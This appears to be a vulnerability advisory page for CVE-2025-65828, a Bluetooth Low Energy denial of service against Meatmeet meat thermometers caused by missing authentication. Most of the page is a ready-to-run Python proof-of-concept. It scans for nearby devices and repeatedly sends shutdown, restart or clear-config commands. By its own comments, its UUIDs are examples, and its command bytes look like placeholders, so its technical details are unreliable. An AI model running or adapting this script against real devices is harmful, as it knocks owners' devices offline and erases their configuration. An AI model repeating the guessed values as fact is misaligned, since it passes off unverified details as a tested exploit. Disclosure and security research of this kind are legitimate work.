Security Vulnerability Report
CVE-2025-65828 CVSS 6.5 MEDIUM

Published: 2025-12-10 21:16:09
Last Modified: 2025-12-30 19:01:09

Description

An unauthenticated attacker within proximity of a Meatmeet device can issue several commands to it over Bluetooth Low Energy (BLE) that result in a Denial of Service. These commands include shutdown, restart, and clear config. Clear config disassociates the device from its user and requires re-configuration before the device can be used again. As a result, the end user is unable to receive updates from the Meatmeet base station, which communicates with the cloud services, until the device has been fixed or turned back on.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:meatmeet:meatmeet_pro_wifi_\&_bluetooth_meat_thermometer_firmware:1.0.34.4:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:meatmeet:meatmeet_pro_wifi_\&_bluetooth_meat_thermometer:-:*:*:*:*:*:*:* - NOT VULNERABLE
Meatmeet smart meat temperature monitoring device (all versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
"""
CVE-2025-65828 PoC - Meatmeet BLE Denial of Service
Author: Security Researcher
Note: This PoC is for educational and authorized testing purposes only.
"""
import argparse
import asyncio

# BleakScanner was used but not imported in the original listing
from bleak import BleakClient, BleakScanner

# Meatmeet device BLE service UUIDs (example UUIDs, verify with actual device)
MEATMEET_SERVICE_UUID = "0000fff0-0000-1000-8000-00805f9b34fb"
MEATMEET_CONTROL_CHAR_UUID = "0000fff1-0000-1000-8000-00805f9b34fb"

# BLE commands for DoS attacks
COMMANDS = {
    "shutdown": bytes([0x01, 0x00, 0x00]),
    "restart": bytes([0x02, 0x00, 0x00]),
    "clear_config": bytes([0x03, 0x00, 0x00]),
}


async def dos_attack(target_mac: str, attack_type: str = "shutdown"):
    """
    Perform BLE DoS attack on Meatmeet device.

    Args:
        target_mac: MAC address of target Meatmeet device
        attack_type: Type of attack (shutdown, restart, clear_config)
    """
    if attack_type not in COMMANDS:
        print(f"[-] Invalid attack type: {attack_type}")
        return

    command = COMMANDS[attack_type]
    print(f"[*] Starting {attack_type} attack on {target_mac}")
    print(f"[*] Sending command: {command.hex()}")

    try:
        async with BleakClient(target_mac) as client:
            if client.is_connected:
                print("[+] Connected to device")
                # Send DoS command
                await client.write_gatt_char(
                    MEATMEET_CONTROL_CHAR_UUID, command, response=True
                )
                print(f"[+] {attack_type} command sent successfully")
                # Send multiple times to ensure execution
                for _ in range(5):
                    await client.write_gatt_char(
                        MEATMEET_CONTROL_CHAR_UUID, command, response=True
                    )
                    await asyncio.sleep(0.1)
                print("[+] Attack completed")
    except Exception as e:
        print(f"[-] Attack failed: {str(e)}")


async def scan_devices():
    """Scan for nearby Meatmeet devices."""
    print("[*] Scanning for BLE devices...")
    devices = await BleakScanner.discover(timeout=10.0)
    meatmeet_devices = []
    for device in devices:
        if device.name and "meatmeet" in device.name.lower():
            print(f"[+] Found Meatmeet device: {device.address}")
            meatmeet_devices.append(device)
    return meatmeet_devices


async def main():
    parser = argparse.ArgumentParser(description="CVE-2025-65828 PoC")
    parser.add_argument("--target", "-t", help="Target device MAC address")
    parser.add_argument(
        "--attack", "-a",
        choices=["shutdown", "restart", "clear_config"],
        default="shutdown",
        help="Attack type",
    )
    parser.add_argument("--scan", "-s", action="store_true", help="Scan for devices")
    args = parser.parse_args()

    if args.scan:
        devices = await scan_devices()
        if not devices:
            print("[-] No Meatmeet devices found")
    elif args.target:
        await dos_attack(args.target, args.attack)
    else:
        parser.print_help()


if __name__ == "__main__":
    asyncio.run(main())
```

Weakness

CWE-306 (Missing Authentication for Critical Function)

References

http://meatmeet.com - Product
https://gist.github.com/dead1nfluence/4dffc239b4a460f41a03345fd8e5feb5#file-denial-of-service-ble-md - Exploit, Third Party Advisory